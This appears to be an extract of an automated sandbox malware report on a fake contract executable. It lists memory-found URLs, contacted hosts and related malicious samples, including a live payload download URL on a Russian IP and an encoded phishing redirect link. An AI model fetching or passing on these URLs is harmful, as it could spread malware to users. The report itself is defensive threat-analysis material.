                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245786403.0000027751380000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245744128.0000027751351000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                              high
                                                              https://aka.ms/dotnet-warnings/[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248575013.000002B7E9051000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                high
                                                                http://ip-api.com/json/[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754000000.00000004.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754039000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                    high
                                                                    https://aka.ms/nativeaot-compatibility[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                      high
                                                                      https://github.com/dotnet/runtime/issues/71847[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                        high
                                                                        https://aka.ms/serializationformat-binary-obsolete[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250716435.000002B7E9DC1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250642336.000002B7E9D70000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                          high
                                                                          https://contoso.com/powershell.exe, 00000009.00000002.2426442069.0000020D1833D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2229378708.0000016DCE5BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2266658120.00000224101B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2426442069.0000020D1833D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://api.ipify.org/[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754020000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://aka.ms/binaryformatter[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250716435.000002B7E9DC1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250642336.000002B7E9D70000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E67C3000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://github.com/mono/linker/pull/649[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247740081.000002B7E6AF0000.00000004.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245786403.0000027751380000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245744128.0000027751351000.00000020.00001000.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2193285575.0000016DBE551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2198121281.0000022400001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2324358449.0000020D082D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://.jpg[Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                        high
                                                                                        https://aka.ms/systemdrawingnonwindows[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251017895.000002B7E9F11000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250944802.000002B7E9E90000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2229378708.0000016DCE5BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2266658120.00000224101B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2426442069.0000020D1833D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://ip-api.com/json/8.46.123.189x[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754039000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://ip-api.com/json/P[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754000000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://89.23.97.214:80/[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754083000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://ns.adoraw-se[Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242777428.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242862693.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242878256.000002B7EB847000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242759471.000002B7EB846000.00000004.00000020.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000003.3242660824.000002B7EB831000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.2324358449.0000020D084F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2193285575.0000016DBE779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2324358449.0000020D084F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://schemas.datacontract.org/2004/07/[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247740081.000002B7E6AF0000.00000004.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.2324358449.0000020D084F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://aka.ms/dotnet/download%s%sInstall[Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                              high
                                                                                                              https://github.com/dotnet/runtime/blob/bbc898f3e5678135b242faeb6eefd8b24bf04f3c/src/native/corehost/[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://go.micropowershell.exe, 00000004.00000002.2198121281.0000022400C33000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://exslt.org/common[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250073254.000002B7E9992000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://89.23.97.214/Team/32cv.exe:[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.00000277540B9000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://contoso.com/Iconpowershell.exe, 00000009.00000002.2426442069.0000020D1833D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://schemas.datacontract.org/2004/07/System.Runtime.Serialization[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://aka.ms/dotnet-illink/com[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E67C3000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://schemas.datacontract.org/2004/07/NETdesign.Plugin.Notifer[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754043000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              http://api.ipify.org:80/[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754020000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://aka.ms/dotnet-illink/nativehostt[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E67C3000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.2324358449.0000020D084F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://89.23.97.214/Team/32cv.exe[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246112462.0000027754020000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                    unknown
                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/[Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmpfalse
Legend (shading of IP rows):
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
104.26.12.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
172.67.19.24 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | false
89.23.97.214 | unknown | Russian Federation | 48687 | MAXITEL-ASRU | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1617339
Start date and time: 2025-02-17 19:34:26 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 26s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: [Huawei] Contract for YouTube partners.exe
Detection: MAL
Classification: mal100.troj.expl.evad.winEXE@14/18@4/5
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 10
• Number of non-executed functions: 5
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50, 20.190.160.14, 40.126.31.1
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 5980 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
13:35:23 | API Interceptor | 56x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | Editing.exe | malicious | Unknown | ip-api.com/json/8.46.123.189
208.95.112.1 | Terms_of_reference_06_01_2025_samsung.scr.exe | malicious | Unknown | ip-api.com/json/8.46.123.189
208.95.112.1 | Contract for Partners.exe | malicious | Unknown | ip-api.com/json/8.46.123.189
208.95.112.1 | JV4lf0wkWV.exe | malicious | Unknown | ip-api.com/json/8.46.123.189
208.95.112.1 | BAMParser.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | Fatality-unpadded.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | 1111.exe | malicious | Unknown | www.ip-api.com/line/?fields=16401
208.95.112.1 | 1111.exe | malicious | Unknown | www.ip-api.com/line/?fields=16401
208.95.112.1 | Xworm-V5.6.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | KNT3NUxTeD.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
149.154.167.220 | Editing.exe | malicious | Unknown |
149.154.167.220 | Terms_of_reference_06_01_2025_samsung.scr.exe | malicious | Unknown |
149.154.167.220 | JV4lf0wkWV.exe | malicious | Unknown |
149.154.167.220 | Nonmerchantable.exe | malicious | GuLoader, Snake Keylogger |
149.154.167.220 | JUSTIFICANTE DE TRANSFERENCIA.exe | malicious | GuLoader, Snake Keylogger |
149.154.167.220 | copia_01929pdf.exe | malicious | AgentTesla |
149.154.167.220 | JUSTIF. PAGO AQUISGRANpdf.exe | malicious | GuLoader, Snake Keylogger |
149.154.167.220 | INQUIRYS#87636_5_PACKAGING_VIET_NAM.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | Hermaean.exe | malicious | GuLoader, MassLogger RAT |
149.154.167.220 | facturar.exe | malicious | GuLoader, Snake Keylogger |
104.26.12.205 | NexoPack Setup 1.0.0.exe | malicious | Unknown | api.ipify.org/
104.26.12.205 | NexoPack Setup 1.0.0.exe | malicious | Unknown | api.ipify.org/
                                                                                                                                                                                            lO5lV39HDj.exeGet hashmaliciousDarkTortilla, QuasarBrowse
                                                                                                                                                                                            • api.ipify.org/
                                                                                                                                                                                            SpacesVoid Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • api.ipify.org/
                                                                                                                                                                                            55ryoipjfdr.exeGet hashmaliciousTrickbotBrowse
                                                                                                                                                                                            • api.ipify.org/
                                                                                                                                                                                            Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • api.ipify.org/
                                                                                                                                                                                            RtU8kXPnKr.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                            • api.ipify.org/
                                                                                                                                                                                            jgbC220X2U.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • api.ipify.org/?format=text
                                                                                                                                                                                            xKvkNk9SXR.exeGet hashmaliciousTrojanRansomBrowse
                                                                                                                                                                                            • api.ipify.org/
                                                                                                                                                                                            GD8c7ARn8q.exeGet hashmaliciousTrojanRansomBrowse
                                                                                                                                                                                            • api.ipify.org/
                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                            pastebin.comfortskinchanger.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 104.20.4.235
                                                                                                                                                                                            fortskinchanger.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 104.20.3.235
                                                                                                                                                                                            Editing.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 104.20.3.235
                                                                                                                                                                                            Terms_of_reference_06_01_2025_samsung.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.67.19.24
                                                                                                                                                                                            Contract for Partners.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.67.19.24
                                                                                                                                                                                            JV4lf0wkWV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 104.20.3.235
                                                                                                                                                                                            XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                            • 104.20.4.235
                                                                                                                                                                                            Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                            • 104.20.3.235
                                                                                                                                                                                            FD7F#U007e1.EXE.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                            • 172.67.19.24
                                                                                                                                                                                            FD7F#U007e1.EXE.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                            • 104.20.4.235
                                                                                                                                                                                            ip-api.com Editing.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            Terms_of_reference_06_01_2025_samsung.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            Contract for Partners.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            JV4lf0wkWV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            BAMParser.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            Fatality-unpadded.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            1111.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            1111.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            Xworm-V5.6.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            KNT3NUxTeD.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            api.ipify.org Editing.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.67.74.152
                                                                                                                                                                                            Terms_of_reference_06_01_2025_samsung.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.67.74.152
                                                                                                                                                                                            Contract for Partners.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.67.74.152
                                                                                                                                                                                            JV4lf0wkWV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.67.74.152
                                                                                                                                                                                            ZIOpctBE0o.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                            • 172.67.74.152
                                                                                                                                                                                            copia_01929pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                            • 104.26.13.205
                                                                                                                                                                                            Doc 1189623388009.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                            • 104.26.12.205
                                                                                                                                                                                            play.wav.htmGet hashmaliciousHtmlDropperBrowse
                                                                                                                                                                                            • 104.26.12.205
                                                                                                                                                                                            CheckList Job no.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                            • 172.67.74.152
                                                                                                                                                                                            http://nodeissuesfix.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 104.26.13.205
                                                                                                                                                                                            api.telegram.org Editing.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            Terms_of_reference_06_01_2025_samsung.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            JV4lf0wkWV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            Nonmerchantable.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            JUSTIFICANTE DE TRANSFERENCIA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            copia_01929pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            JUSTIF. PAGO AQUISGRANpdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            INQUIRYS#87636_5_PACKAGING_VIET_NAM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            Hermaean.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            facturar.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                            TELEGRAMRU Editing.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            Terms_of_reference_06_01_2025_samsung.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            JV4lf0wkWV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            Nonmerchantable.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            updater.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                            • 149.154.167.99
                                                                                                                                                                                            JUSTIFICANTE DE TRANSFERENCIA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            copia_01929pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            JUSTIF. PAGO AQUISGRANpdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            INQUIRYS#87636_5_PACKAGING_VIET_NAM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            Hermaean.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            CLOUDFLARENETUShttps://login.issue.autonews.com/custompages/crain/login.aspx?pbid=1bfa4d66-4500-4052-8d12-b04775c24d16Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                            • 172.67.26.11
                                                                                                                                                                                            fortskinchanger.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 104.21.80.1
http://link.shoppermeet.net/deep-link?clickid=01H1RW78ZQF6QB5RM2RB5KGV69&geo=us&ip=66.249.66.3&merchantid=108994&propertyid=417896&publisherkey=0f210dc9-c1ef-4153-bd53-8fb98995be03&subid=01GWHNP35ZW7N25QKXMEA9EHVQ&url=%68%74%74%70%73%3A%2F%2F%6F%43%35%4F%43%66%51%50%46%54%30%75%4B%62%59%48%6D%41%67%54%2E%62%72%69%67%68%74%6E%65%78%73%74%2E%72%75%2F%70%61%78%36%6C%66%31%2F%23%23sap@virtualintelligencebriefing.com | malicious | Unknown | 172.67.70.161
fortskinchanger.exe | malicious | Unknown | 104.21.32.1
Editing.exe | malicious | Unknown | 172.67.74.152
Terms_of_reference_06_01_2025_samsung.scr.exe | malicious | Unknown | 172.67.74.152
Contract for Partners.exe | malicious | Unknown | 172.67.74.152
JV4lf0wkWV.exe | malicious | Unknown | 172.67.74.152
https://www.buildwithbrick.com/ | malicious | Unknown | 188.114.96.3
ZIOpctBE0o.exe | malicious | CredGrabber, Meduza Stealer | 172.67.74.152

Match: CLOUDFLARENETUS
https://login.issue.autonews.com/custompages/crain/login.aspx?pbid=1bfa4d66-4500-4052-8d12-b04775c24d16 | malicious | HTMLPhisher | 172.67.26.11
fortskinchanger.exe | malicious | Unknown | 104.21.80.1
http://link.shoppermeet.net/deep-link?clickid=01H1RW78ZQF6QB5RM2RB5KGV69&geo=us&ip=66.249.66.3&merchantid=108994&propertyid=417896&publisherkey=0f210dc9-c1ef-4153-bd53-8fb98995be03&subid=01GWHNP35ZW7N25QKXMEA9EHVQ&url=%68%74%74%70%73%3A%2F%2F%6F%43%35%4F%43%66%51%50%46%54%30%75%4B%62%59%48%6D%41%67%54%2E%62%72%69%67%68%74%6E%65%78%73%74%2E%72%75%2F%70%61%78%36%6C%66%31%2F%23%23sap@virtualintelligencebriefing.com | malicious | Unknown | 172.67.70.161
fortskinchanger.exe | malicious | Unknown | 104.21.32.1
Editing.exe | malicious | Unknown | 172.67.74.152
Terms_of_reference_06_01_2025_samsung.scr.exe | malicious | Unknown | 172.67.74.152
Contract for Partners.exe | malicious | Unknown | 172.67.74.152
JV4lf0wkWV.exe | malicious | Unknown | 172.67.74.152
https://www.buildwithbrick.com/ | malicious | Unknown | 188.114.96.3
ZIOpctBE0o.exe | malicious | CredGrabber, Meduza Stealer | 172.67.74.152

Match: TUT-ASUS
Editing.exe | malicious | Unknown | 208.95.112.1
Terms_of_reference_06_01_2025_samsung.scr.exe | malicious | Unknown | 208.95.112.1
Contract for Partners.exe | malicious | Unknown | 208.95.112.1
JV4lf0wkWV.exe | malicious | Unknown | 208.95.112.1
BAMParser.exe | malicious | XWorm | 208.95.112.1
Fatality-unpadded.exe | malicious | XWorm | 208.95.112.1
1111.exe | malicious | Unknown | 208.95.112.1
1111.exe | malicious | Unknown | 208.95.112.1
Xworm-V5.6.exe | malicious | XWorm | 208.95.112.1
KNT3NUxTeD.exe | malicious | AgentTesla | 208.95.112.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: 3b5074b1b5d032e5620f69f9f700ff0e
fortskinchanger.exe | malicious | Unknown | 172.67.19.24, 149.154.167.220
fortskinchanger.exe | malicious | Unknown | 172.67.19.24, 149.154.167.220
Editing.exe | malicious | Unknown | 172.67.19.24, 149.154.167.220
Terms_of_reference_06_01_2025_samsung.scr.exe | malicious | Unknown | 172.67.19.24, 149.154.167.220
Contract for Partners.exe | malicious | Unknown | 172.67.19.24, 149.154.167.220
